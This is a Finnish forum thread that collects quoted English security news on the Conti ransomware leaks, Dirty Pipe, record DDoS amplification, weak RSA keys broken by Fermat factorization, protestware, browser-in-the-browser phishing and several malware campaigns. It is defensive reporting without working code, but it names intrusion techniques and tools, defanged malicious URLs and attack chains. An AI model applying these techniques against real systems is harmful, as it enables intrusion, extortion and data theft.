Cyber-ketju: verkkovakoilu,kännyköiden ja wlanien seuranta, hakkerointi, virukset, DoS etc

[ctg]

A Ukrainian security researcher this week leaked several years of internal chat logs and other sensitive data tied to Conti, an aggressive and ruthless Russian cybercrime group that focuses on deploying its ransomware to companies with more than $100 million in annual revenue. The chat logs offer a fascinating glimpse into the challenges of running a sprawling criminal enterprise with more than 100 salaried employees. The records also provide insight into how Conti has dealt with its own internal breaches and attacks from private security firms and foreign governments.

Conti Ransomware Group Diaries, Part I: Evasion – Krebs on Security

Conti Ransomware Group Diaries, Part II: The Office – Krebs on Security

Conti Ransomware Group Diaries, Part III: Weaponry – Krebs on Security

As a response to Western warmongering and American threats to use cyber warfare against the citizens of the Russian Federation, the Conti Team is officially announcing that we will use our full capacity to deliver retaliatory measures in case the Western warmongers attempt to target critical infrastructure in Russia or any Russian-speaking region of the world. We do not ally with any government and we condemn the ongoing war. However, since the West is known to wage its wars primarily by targeting civilians, we will use our resources in order to strike back if the well being and safety of peaceful citizens will be at stake due to American cyber aggression.

This Week In Security: Ukraine, Nvidia, And Conti

The geopolitics surrounding the invasion of Ukraine are outside the scope of this column, but the cybersecurity ramifications are certainly fitting fodder. The challenge here is that almost everyth…

hackaday.com

https://twitter.com/x/status/1498394338027610124

 

[ctg]

A datacenter fire resulted in internet outages across Iran for around three hours last Friday, and it appears the cause was the nation's surveillance apparatus.

The fire took place at a building belonging to the Telecom Infrastructure Company (TIC) – the only reseller of connectivity to Iranian internet service providers. The TIC applies content filters so that ISPs receive a feed cleansed of anything Iran's rulers don't want citizens to see – which means religious or political content that disagrees in any way with the views of the revolutionary government.

According to Netblocks, the centralized gateway "allows Iranian authorities to control the flow of information to counter cyberthreats, but has also come under scrutiny for its use to limit the public's access to information and international services."

Iran's internet chokepoint caught fire, caused outages

Digital karma at its finest

www.theregister.com

 

[ctg]

 

[ctg]

The name Dirty Pipe is meant to both signal similarities to Dirty Cow and provide clues about the new vulnerability's origins. "Pipe" refers to a pipeline, a Linux mechanism for one OS process to send data to another process. In essence, a pipeline is two or more processes that are chained together so that the output text of one process (stdout) is passed directly as input (stdin) to the next one.

Tracked as CVE-2022-0847, the vulnerability came to light when a researcher for website builder CM4all was troubleshooting a series of corrupted files that kept appearing on a customer's Linux machine. After months of analysis, the researcher finally found that the customer's corrupted files were the result of a bug in the Linux kernel.

The researcher—Max Kellermann of CM4all parent company Ionos—eventually figured out how to weaponize the vulnerability to allow anyone with an account—including least privileged "nobody" accounts—to add an SSH key to the root user's account. With that, the untrusted user could remotely access the server with an SSH window that has full root privileges.

Linux has been bitten by its most high-severity vulnerability in years

Dirty Pipe has the potential to smudge people using Linux and Linux derivitives.

arstechnica.com

 

[magitsu]

https://twitter.com/x/status/1500969197316153345

 

[magitsu]

Ei juma mikä tunarointi.

– Salattu yhteys ei toimi täällä. Emme saa ketään kiinni, kuuluu vastaus.

Grozevin mukaan kyseessä on Venäjän puolustusministeriön viime vuonna käyttöön ottama kallis Era-viestintäjärjestelmä. Se ei näytä syystä tai toisesta toimineen Ukrainassa.
Christo Grozevin mukaan syynä voi olla 3G- ja 4G-verkkojen puuttuminen. Era käyttää näitä verkkoja, mutta Venäjän joukot tuhonneet valtaosan tietoliikennemastoista esimerkiksi Harkovan alueella.

– Venäjän armeija on varustettu suojatuilla puhelimilla, jotka eivät toimi alueilla, joilla se operoi, hän summaa.

Grozev luonnehtii tätä ”suurimmaksi sotilaallisen operaatioturvallisuuden virheeksi kautta aikojen”.

FSB:n upseeri kertoo kenraalin kuolemasta - paljastava ääninauha Ukrainasta | Verkkouutiset

Hyökkääjä vaikuttaa kärsivän vakavista viestintävaikeuksista.

www.verkkouutiset.fi

edit: ap twiitit

https://twitter.com/x/status/1500978613113524229

 

[ctg]

One of the oldest amplification vectors is misconfigured DNS servers, which increase DDoS volumes by about 54 times. New amplification routes have included the Network Time Protocol servers (about 556x), Plex media servers (about 5x), Microsoft RDP (86x), and the Connectionless Lightweight Directory Access Protocol (at least 50x). Just last week, researchers described a new amplification vector that achieves a factor of at least 65.

Previously, the biggest known amplifier was memcached, which has the potential to increase traffic by an astounding 51,000x.

The newest entrant is the Mitel MiCollab and MiVoice Business Express collaboration systems. Attackers have been using them for the past month to DDoS financial institutions, logistics companies, gaming companies, and organizations in other markets. A fleet of 2,600 servers is exposing an abusable system test facility in the software to the Internet through UDP port 10074, in a break with manufacturer recommendations that the tests be reachable only internally.

New method that amplifies DDoSes by 4 billion-fold. What could go wrong?

New method also stretches out DDoS durations to 14 hours.

arstechnica.com

The new amplification vector provided by the misconfigured Mitel servers has the potential to shatter those records. The vector can do this not only because of the unprecedented 4 billion-fold amplification potential, but also because the Mitel systems can stretch out the attacks for lengths of time not previously possible.

“This particular attack vector differs from most UDP reflection/amplification attack methodologies in that the exposed system test facility can be abused to launch a sustained DDoS attack of up to 14 hours in duration by means of a single spoofed attack initiation packet, resulting in a record-setting packet amplification ratio of 4,294,967,296:1,” researchers from eight organizations wrote in a joint advisory. “A controlled test of this DDoS attack vector yielded more than 400mpps of sustained DDoS attack traffic.”

A single abusable node generating this much amplification at a rate of 80 thousand packets per second can theoretically deliver the 14-hour data flood. Over that time, “counter” packets—which track the number of responses the servers send—would generate roughly 95.5GB of amplified attack traffic destined for the targeted network. Separate “diagnostic output” packets could account for an additional 2.5TB of attack traffic directed toward the target.

 

[ctg]

It turns out that even criminal operations are having difficulty hiring and keeping good staff these days. "Conti understands that the turnover ratio of workers is also very high due to the fact that they are running a criminal organization," BreachQuest wrote. "The Conti group has an HR/Recruiter that assists with the continual finding and recruitment of new candidates."

While Conti has been known for big game hunting — or focusing on high-value targets that will likely pay big bucks to get its encrypted data restored, or to prevent exfiltrated info from being publicly leaked — BreachQuest goes into detail about how Conti ensures that its processes pay off:

When the Conti group compromises Active Directory, they are looking for potentially interesting people like an admin, engineer, or someone in IT. Many companies think that backups are sufficient, but Conti hunts for backup servers to encrypt the backups as well as training manuals reveal that they know techniques to bypass backup storage vendors to make sure the backups are encrypted.
One of the instructions that stood out the most was a section titled "HOW AND WHAT INFO TO DOWNLOAD" that they state after raising the privileges to domain admin and invoke share finder, what Conti is interested in are financial documents, accounting, clients, projects, and much more.

CyberArk posted its own analysis of the Conti leaks, and says the information can help organizations protect themselves. One of the data dumps included 12 git repositories of what's said to be internal Conti software.

"Upon quick inspection of these repositories, most of the code appears to be open-source software that is used by the Conti group," the analysis said. "For instance, yii2 or Kohana is used as part of (what seems to be) the admin panel. The code is mostly written in PHP and is managed by Composer, with the exception of one repository of a tool written in Go."

Leaked Conti files reveal life inside ransomware gang

Not only is this payback sweet, it gives network defenders valuable intelligence

www.theregister.com

Techniques from the chat:
Active Directory Enumeration
SQL Databases Enumeration via sqlcmd.
How to gain access to Shadow Protect SPX (StorageCraft) backups.
How to create NTDS dumps vs vssadmin
How to open New RDP Port 1350

List of Tools:
Cobalt Strike
Metasploit
PowerView
ShareFinder
AnyDesk
Mimikatz

Conti Group Leaked!

The conflict in Ukraine has driven significant attention from the cybersecurity community, due in large part to the cyber attacks conducted against Ukraine infrastructure — including evidence of...

www.cyberark.com

 

[ctg]

In explaining the vulnerability, Böck wrote:


The idea of Fermat's factorization algorithm is that a product of two large primes can always be written as N=(a-b)(a+b), with a being the middle between the two primes and b the distance from the middle to each of the primes.
If the primes are close then a is close to the square root of N. This allows guessing the value a by starting with the square root of N and then incrementing the guess by one each round.
For each guess, we can calculate b^2 = a^2 - N. If the result is a square, we know we have guessed a correctly. From this, we can calculate p=a+b and q=a-b.
Fermat described this algorithm originally in a letter in 1643. The text of the original letter can be found in Oeuvres de Fermat, page 256, available at the Internet Archive.


He continued:


How can this happen?
An RSA library is vulnerable if the two primes p and q are close. If the primes are generated independently and randomly, then the likelihood of p and q being close is negligible.
An RSA library might, however, implement a flawed key generation algorithm like this:

• Generate random number X.
• Search the next prime after X and use it as p.
• Search the next prime after p and use it as q.

For common RSA key sizes, this creates p and q with a difference that is usually in the thousands or lower. This can easily be broken with Fermat's factorization method.
How "close" do primes need to be in order to be vulnerable?
With common RSA key sizes (2048 bit) in our tests, the Fermat algorithm with 100 rounds reliably factors numbers where p and q differ up to 2^517. In other words, it can be said that primes that only differ within the lower 64 bytes (or around half their size) will be vulnerable.
Up to 2^514 it almost always finds the factorization in the first round of the algorithm. It could be argued that the 100 rounds is therefore excessive; however, the algorithm is so fast that it practically does not matter much.
Can vulnerable keys be generated by accident if primes are generated randomly and independently?
This is almost impossible. For primes to be "close" they would have to be identical at least on their upper 500 bits. The chance of that happening is therefore smaller than 1:2^500.

Researcher uses 379-year-old algorithm to crack crypto keys found in the wild

It takes only a second to crack the handful of weak keys. Are there more out there?

arstechnica.com

The discovery of these keys doesn't indicate that they've created much of a security risk, particularly because none of them are used for especially sensitive applications. Still, it's possible that the discovery indicates a larger problem and that more vulnerable keys or key-generation software are still out there.

 

[ctg]

Amid the ongoing disruption from Russia, some ethical hackers in Ukraine are feeling lost as bug bounty platform HackerOne has allegedly withheld their payouts. The loss due to the sudden halt is said to have mounted to hundreds and thousands of dollars. A few of the affected ethical hackers — also known as cybersecurity researchers — have taken the issue to social media. Some of them have also written to the platform to get clarity on why exactly it has disabled their payments in the middle of the humanitarian catastrophe in the country.

Ethical hackers normally earn payouts ranging from tens and hundreds to over millions of dollars in the form of rewards through bug bounty platforms for reporting flaws in various Internet-based solutions. However, HackerOne is said to have suddenly stopped payouts for some Ukrainian hackers.

Earlier this month, HackerOne CEO Marten Mickos had announced, "[A]s we work to comply with the new sanctions, we'll withdraw all programmes for customers based in Russia, Belarus, and the occupied areas of Ukraine." On Monday, he clarified that the restrictions were for sanctioned regions - Russia and Belarus, not mentioning any clear details about the status of Ukraine.

“That's a really weird situation,” said independent security researcher Bob Diachenko, who has been associated with the San Francisco, California-based platform for the last two–three years now.

The security researcher tweeted on Sunday that HackerOne stopped paying bounties worth around $3,000 (roughly Rs. 2,30,000) for the flaws he reported.

Alongside stopping payouts, HackerOne has removed its ‘Clear' status from all Ukraine accounts. The status essentially allows ethical hackers to participate in private programmes run by various companies to earn a minimum of $2,000 (roughly Rs. 1,53,100) for a high-severity vulnerability or $5,000 (roughly Rs. 3,82,800) for a critical one. It requires background-check for researchers to participate in the listed programmes.

Ukraine Hackers Bewildered as Leading Bug Bounty Firm Said to Halt Payouts

HackerOne has allegedly halted the payouts of thousands of dollars for ethical hackers in Ukraine.

gadgets360.com

 

[ctg]

An audit of NASA's infosec preparedness against insider threats has warned it faces "serious jeopardy to operations" due to lack of protection for unclassified information.

A Monday report [PDF] found that NASA has done well, as required, in its efforts to defend and prevent insider threats to classified information – stuff that NASA defines as "Official information regarding the national security that has been designated Confidential, Secret, or Top Secret."

The report found the agency has deployed defenses including user activity monitoring, adopted mandatory agency-wide insider threat training, and "created an insider threat reference website that assists employees and contractors with identifying threats, their risks, and follow-up information." Procurement controls are being strengthened in ways that address risks of foreign influence.

But while the report is satisfied NASA has done well to protect its classified info, it notes that "the vast majority" of NASA tech is not classified, including plenty of "high-value assets and critical infrastructure." Among those assets are "sensitive and valuable information such as scientific, engineering, or research data; human resources files; or procurement sensitive information." Because that infrastructure is not classified, it's not covered by the insider threat program.

And that's a worry, because in 2021 NASA's auditor found "incidents of improper use of NASA IT systems had increased from 249 in 2017 to 1,103 in 2020 – a 343 per cent growth; the most prevalent error was failing to protect Sensitive but unclassified (SBU) information."

NASA in 'serious jeopardy' due to big black hole in security

Auditor finds space agency defends classified info well, isn't paying attention to valuable unclassified data

www.theregister.com

 

[ctg]

The Conti ransomware gang was on top of the world. The sprawling network of cybercriminals extorted $180 million from its victims last year, eclipsing the earnings of all other ransomware gangs. Then it backed Vladimir Putin’s invasion of Ukraine. And it all started falling apart.

Conti’s implosion started with a single post on the group’s website, usually reserved for posting the names of its victims. Hours after Russian troops crossed Ukrainian borders on February 24, Conti offered its “full support” to the Russian government and threatened to hack critical infrastructure belonging to anyone who dared to launch cyberattacks against Russia.

But while many Conti members live in Russia, its scope is international. The war has divided the group; privately, some had railed against Putin’s invasion. And while Conti’s ringleaders scrambled to retract their statement, it was too late. The damage had been done. Especially because the dozens of people with access to Conti’s files and internal chat systems included a Ukrainian cybersecurity researcher who had infiltrated the group. They proceeded to rip Conti wide open.

The Workaday Life of the World’s Most Dangerous Ransomware Gang

A Ukrainian researcher leaked 60,000 messages from inside the Conti ransomware group. This is what they reveal.

www.wired.co.uk

 

[ctg]

After years of tantalizing hints that a passwordless future is just around the corner, you're probably still not feeling any closer to that digital unshackling. Ten years into working on the issue, though, the FIDO Alliance, an industry association that specifically works on secure authentication, thinks it has finally identified the missing piece of the puzzle.

On Thursday, the organization published a white paper that lays out FIDO's vision for solving the usability issues that have dogged passwordless features and, seemingly, kept them from achieving broad adoption. FIDO's members collaborated to produce the paper, and they span chipmakers like Intel and Qualcomm, prominent platform developers like Amazon and Meta, financial institutions like American Express and Bank of America, and the developers of all major operating systems—Google, Microsoft, and Apple.

The paper is conceptual, not technical, but after years of investment to integrate what are known as the FIDO2 and WebAuthn passwordless standards into Windows, Android, iOS, and more, everything is now riding on the success of this next step.

“The key to being successful for FIDO is being readily available—we need to be as ubiquitous as passwords,” says Andrew Shikiar, executive director of the FIDO Alliance. “Passwords are part of the DNA of the web itself, and we’re trying to supplant that. Not using a password should be easier than using a password.”

In practice, though, even the most seamless passwordless schemes are not quite there. Part of the challenge simply lies with the enormous inertia passwords have built up. Passwords are difficult to use and manage, which drives people to take shortcuts like reusing them across accounts and creates security issues at every turn. Ultimately, though, they’re the devil you know. Educating consumers about passwordless alternatives and getting them comfortable with the change has proven difficult.

Beyond just acclimating people, though, FIDO is looking to get to the heart of what still makes passwordless schemes tough to navigate. And the group has concluded that it all comes down to the procedure for switching or adding devices. If the process for setting up a new phone, say, is too complicated, and there’s no simple way to log in to all of your apps and accounts—or if you have to fall back to passwords to reestablish your ownership of those accounts—then most users will conclude that it’s too much of a hassle to change the status quo.

The passwordless FIDO standard already relies on a device’s biometric scanners (or a master PIN you select) to authenticate you locally without any of your data traveling over the Internet to a web server for validation. The main concept that FIDO believes will ultimately solve the new device issue is for operating systems to implement a “FIDO credential” manager, which is somewhat similar to a built-in password manager. Instead of literally storing passwords, this mechanism will store cryptographic keys that can sync between devices and are guarded by your device’s biometric or passcode lock.

At Apple’s Worldwide Developer Conference last summer, the company announced its own version of what FIDO is describing, an iCloud feature known as “Passkeys in iCloud Keychain,” which Apple says is its “contribution to a post-password world.”

A big bet to kill the password for good

FIDO Alliance says it’s found the missing piece on the path to a password-free future.

arstechnica.com

Kuinka kaikki munat samassa korissa voi olla hyvä idea kun ensimmäisiä infosec opetuksia on että mikään ei ole turvallinen ikuisesti. Ei mikään.

 

[ctg]

A developer has been caught adding malicious code to a popular open-source package that wiped files on computers located in Russia and Belarus as part of a protest that has enraged many users and raised concerns about the safety of free and open source software.

The application, node-ipc, adds remote interprocess communication and neural networking capabilities to other open source code libraries. As a dependency, node-ipc is automatically downloaded and incorporated into other libraries, including ones like Vue.js CLI, which has more than 1 million weekly downloads.

Two weeks ago, the node-ipc author pushed a new version of the library that sabotaged computers in Russia and Belarus, the countries invading Ukraine and providing support for the invasion, respectively. The new release added a function that checked the IP address of developers who used the node-ipc in their own projects. When an IP address geolocated to either Russia or Belarus, the new version wiped files from the machine and replaced them with a heart emoji.

Sabotage: Code added to popular NPM package wiped files in Russia and Belarus

When code with millions of downloads nukes user files, bad things can happen.

arstechnica.com

Uusi ilmiö, protestware.

 

[ctg]

A novel way of tricking people out of their passwords has left us wondering if there's a need to rethink how much we trust our web browsers to protect us and to accelerate efforts to close web security gaps.

Earlier this week, an infosec researcher known as mr.d0x described a browser-in-the-browser (BitB) attack. It's a way to steal login credentials by simulating the little browser windows that Google, Microsoft, and other authentication service providers pop up that ask you for your username and password to continue. You've probably seen these windows: you click on something like a "Sign in with Microsoft" button on a website, and popup appears asking for your credentials to access your account or profile.

Services like Google Sign-In will display a Google URL in the popup window navigation bar, which offers some reassurance that the login service is actually coming from a trusted company and not an unknown one. And bypassing defenses built into the user's browser to fool them into trusting a malicious page tends to be difficult in the absence of an exploitable vulnerability, thanks to browser security mechanisms including Content Security Policy settings and the Same-origin policy security model.

However, there are methods like clickjacking or user-interface redressing that alter the appearance of browsers and web pages to dupe people in ways that bypass security controls. A clickjacking attack might, for example, interpose a transparent element over a web page button so that a user's click event gets hijacked for some nefarious purpose.

The BitB attack extends this technique by creating an entirely fabricated browser window, including trust signals like a locked padlock icon and a known (but faked) URL. You think you're seeing a real popup window, but it's actually just faked within the page, and ready to capture your credentials.

"Fortunately for us, replicating the entire window design using basic HTML/CSS is quite simple," explains mr.d0x. "Combine the window design with an iframe pointing to the malicious server hosting the phishing page, and it's basically indistinguishable."

This technique, says mr.d0x, makes phishing more effective. Victims would still need to visit a compromised or malicious website to generate the popup but thereafter will be more likely to submit credentials because nothing looks amiss.

There are limitations to this approach because while it may deceive people, it's unlikely to fool other software. Password managers, for example, probably wouldn't autofill credentials into a BitB window because they wouldn't see it as a real browser window.

Nonetheless, BitB has raised concern among some security researchers as a way to exploit the insecurity of the ad ecosystem.

This browser-in-the-browser attack is perfect for phishing

If you're involved in malvertising, please don't read this. We don't want to give you ideas

www.theregister.com

Yksinkertaisin keino on kieltää kaikki pop-up ikkunat, mutta se ei ehkä ole se kaikkien helpoin ratkaisu.

 

[ctg]

Cyclops Blink malware has infected ASUS routers in what Trend Micro says looks like an attempt to turn these compromised devices into command-and-control servers for future attacks.

ASUS says it's working on a remediation for Cyclops Blink and will post software updates if necessary. The hardware maker recommends users reset their gateways to factory settings to flush away any configurations added by an intruder, change the login password, make sure remote management access from the WAN is disabled, and ensure the latest firmware is installed to be safe.

Cyclops Blink has ties to Kremlin-backed Sandworm, the criminal gang behind the nasty VPNFilter malware that in 2018 targeted routers and storage devices. The crew also carried out several high-profile attacks including the 2015 and 2016 cyber-assaults on Ukraine's electrical grid, NotPetya in 2017, and the French presidential campaign email leak that same year.

A Trend Micro warning about the router hijackings follows a joint advisory last month from the FBI, CISA, the US Department of Justice, and the UK National Cyber Security Centre about Cyclops Blink, which the agencies said looked to be Sandworm's replacement for VPNFilter. At the time, the botnet had its sights set on WatchGuard firewall appliances.

"Our data also shows that although Cyclops Blink is a state-sponsored botnet, its C&C servers and bots affect WatchGuard Firebox and Asus devices that do not belong to critical organizations, or those that have an evident value on economic, political, or military espionage," Trend Micro said. "Hence, we believe that it is possible that the Cyclops Blink botnet's main purpose is to build an infrastructure for further attacks on high-value targets."

Cyclops Blink malware sets up shop in ASUS routers

Kremlin-backed Sandworm has its VPNFilter replacement, it seems

www.theregister.com

It's not clear exactly right now how the malware gets onto a device, though it probably involves exploiting a default admin password to gain access via an enabled remote management service. According to Trend Micro's Cyclops Blink technical analysis, once the modular malware, written in C, has been injected into the gateway and is running, it sets itself up and renames its process to "[ktest]" presumably to appear as a Linux kernel thread.

Next, it waits for 37 seconds and decides on the hard-coded command-and-control (C2) server to talk to along with the rate at which it communicates with the box. Then it begins communicating with its C2 server using an OpenSSL-encrypted channel to join the Cyclops Blink botnet. Among the commands it can receive, the compromised router can be given more malware to run, allowing the botnet's controllers to do whatever they like on the hijacked gateways.

 

[ctg]

Pro-Ukraine security researcher @ContiLeaks yesterday uploaded a fresher version of Conti ransomware than they had previously released – specifically, the source code for Conti Ransomware V3.0 – to VirusTotal.

ContiLeaks posted a link to the code on Twitter. The code includes a compiled locker and decryptor, according to vx-underground, which has been archiving the leaks.

The archive is password-protected, but the password is easy to figure out, according to replies to ContiLeaks’ release.

source conti v3. https://t.co/1dcvWYpsp7
— conti leaks (@ContiLeaks) March 20, 2022

ContiLeaks followed up in a few hours by thumbing their nose at the pro-Russia law enforcement that the researcher said is looking for them in the UA – in other words, in Ukraine.

“i can tell you good luck mf!” ContiLeaks tweeted, using another acronym that probably doesn’t need explaining.

Conti Ransomware V. 3, Including Decryptor, Leaked

The latest is a fresher version of the ransomware pro-Ukraine researcher ContiLeaks already released, but it’s reportedly clunkier code.

threatpost.com

In related news, on Monday, eSentire’s Threat Research Unit (TRU) published a report about a new Conti affiliate group. The report details new accounts, specific IP addresses, domain names and Protonmail email accounts linked to the affiliate, Indicators of Compromise that organizations should address immediately, an overview of attack vectors, and how the affiliate is – like so many criminals – abusing the Cobalt Strike intrusion framework for attack purposes.

eSentire’s report details one such Cobalt Strike incident, nicknamed ShadowBeacon, during which the Cobalt beacons were being deployed from the domain controllers via PsExec: a legitimate admin tool used for remotely executing binaries.

Together with BreakPoint Labs (BPL), TRU observed threat actors leveraging the Cobalt Strike infrastructure to attack seven different U.S. companies between 2021 and 2022. According to eSentire, victims included companies in the financial, environmental, legal and charitable sectors.

“The Windows logs revealed that the threat actor had been able to register their own virtual machine on the victim organization’s network,” the report noted, “using it as a pivot to their actual, exterior [command-and-control, aka C2, server].”

 

[ctg]

Researchers have discovered a cyberattack that uses unusual evasion tactics to backdoor French organizations with a novel malware dubbed Serpent, they said.

A team from Proofpoint observed what they call an “advanced, targeted threat” that uses email-based lures and malicious files typical of many malware campaigns to deliver its ultimate payload to targets in the French construction, real-estate and government industries.

However, between initial contact and payload, the attack uses methods to avoid detection that haven’t been seen before, researchers revealed in a blog post Monday.

Serpent Backdoor Slithers into Orgs Using Chocolatey Installer

An unusual attack using an open-source package installer called Chocolatey, steganography and Scheduled Tasks is stealthily delivering spyware to companies.

threatpost.com

The attack chain begins as many email-based attacks do—with an email that appears to be coming from a legitimate source that includes a Microsoft Word document containing malicious macros. Various parts of the macro include ASCII art that depicts a snake, giving the backdoor its name, researchers said.

The macro-laden document purports to have important information related to the “règlement général sur la protection des données (RGPD),” aka the European Union’s General Data Protection Regulations (GDPR), a law which mandates how companies must report data leaks to the government.

If macros are enabled, the document executes the document’s macro, which reaches out to an image URL–e.g., https://www.fhccu[.]com/images/ship3[.]jpg–that contains a base64 encoded PowerShell script hidden using steganography.

The PowerShell script first downloads, installs and updates the installer package and repository script for Chocolatey, a software management automation tool for Windows that wraps installers, executables, .ZIP files and scripts into compiled packages, researchers said.

“Leveraging Chocolatey as an initial payload may allow the threat actor to bypass threat-detection mechanisms because it is a legitimate software package and would not immediately be identified as malicious,” researchers noted.

The script then uses Chocolatey to install Python, including the pip Python package installer. This component then installs various dependencies including PySocks, a Python-based reverse proxy client that enables users to send traffic through SOCKS and HTTP proxy servers, researchers said.

Next, the PowerShell script fetches another image file–e.g. https://www.fhccu[.]com/images/7[.]jpg,–which contains a base64 encoded Python script that also is obscured using steganography, they said. The PowerShell script saves the Python script as “MicrosoftSecurityUpdate.py” and then creates and executes a .bat file that in turn executes the Python script.

The attack chain ends with a command to a shortened URL which redirects to the Microsoft Office help website, researchers said. The steganographic images used to hide the scripts are hosted on what appears to be a Jamaican credit-union website, they added.

 

[ctg]

Russia’s biggest Internet company has embedded code into apps found on mobile devices that allows information about millions of users to be sent to servers located in its home country.

The revelation relates to software created by Yandex that permits developers to create apps for devices running Apple’s iOS and Google’s Android, systems that run the vast majority of the world’s smartphones.

Yandex collects user data harvested from mobile phones before sending the information to servers in Russia. Researchers have raised concerns the same “metadata” may then be accessed by the Kremlin and used to track people through their mobile phones.

Researcher Zach Edwards first made the discovery regarding Yandex’s code as part of an app auditing campaign for Me2B Alliance, a nonprofit. Four independent experts ran tests for the Financial Times to verify his work.

Yandex has acknowledged its software collects “device, network, and IP address” information that is stored “both in Finland and in Russia,” but it called this data “non-personalized and very limited.” It added: “Although theoretically possible, in practice it is extremely hard to identify users based solely on such information collected. Yandex definitely cannot do this.”

The revelations come at a critical time for Yandex, often referred to as “Russia’s Google,” which has long attempted to chart an independent path without falling foul of Russian President Vladimir Putin’s desire for greater control of the Internet.

The company said it followed “a very strict” internal process when dealing with governments: “Any requests that fail to comply with all relevant procedural and legal requirements are turned down.”

But Cher Scarlett, formerly a principal software engineer in global security at Apple, said once user information was collected on Russian servers, Yandex could be obliged to submit it to the government under local laws. Other experts said that the metadata of the sort collected by Yandex could be used to identify users.

Ron Wyden, chair of the US Senate’s finance committee and one of the architects of US Internet regulation, heavily criticized Google and Apple for not doing enough to secure smartphones from the Yandex software, which has found its way onto 52,000 apps reaching hundreds of millions of consumers.

“These apps leech private, sensitive data from apps on your phone, threatening US national security and the privacy of Americans and other individuals around the world,” he said.

Yandex is considered a global tech giant and is listed on the New York Stock Exchange and majority-owned by American funds. It is incorporated in Amsterdam, and founder Arkady Volozh lives in Israel. In 2019, the company reached an agreement with the Russian government, codifying a structure that ensures that Moscow can intervene on some issues such as foreign acquisitions without control of day-to-day operations.

Data-harvesting code in mobile apps sends user data to “Russia’s Google”

Data from apps on Apple- and Google-powered mobile devices is sent to Russian servers.

arstechnica.com

 

[ctg]

“In recent years, UPS vendors have added an Internet of Things [IoT] capability, and UPSs are routinely attached to networks for power monitoring, routine maintenance and/or convenience,” according to a Tuesday alert from CISA (PDF). “Loads for UPSs can range from small (e.g., a few servers) to large (e.g., a building) to massive (e.g., a data center).”

If attackers are able to remotely take over the devices, they can be used for a host of nefarious ends. For instance, bad actors can use them as a jumping-off point to breach a company’s internal network and steal data. Or, in a grimmer scenario, they could be used to cut power for mission-critical appliances, equipment or services, which could cause physical injury in an industrial environment, or disrupt business services, leading to significant financial losses.

Further, cyberattackers could also execute remote code to alter the operation of the UPSs themselves, or physically damage them (or the devices connected to them).

“It’s easy to forget that every device connected to the internet is at increased risk of attack,” Tim Erlin, vice president of strategy at Tripwire, noted via email. “Just because a vendor provides the capability to put a device on the internet, doesn’t mean that it’s set up to be secure. It’s up to each organization to ensure that the systems they deploy are configured securely.”

Cyberattackers Target UPS Backup Power Devices in Mission-Critical Environments

The active attacks could result in critical-infrastructure damage, business disruption, lateral movement and more.

threatpost.com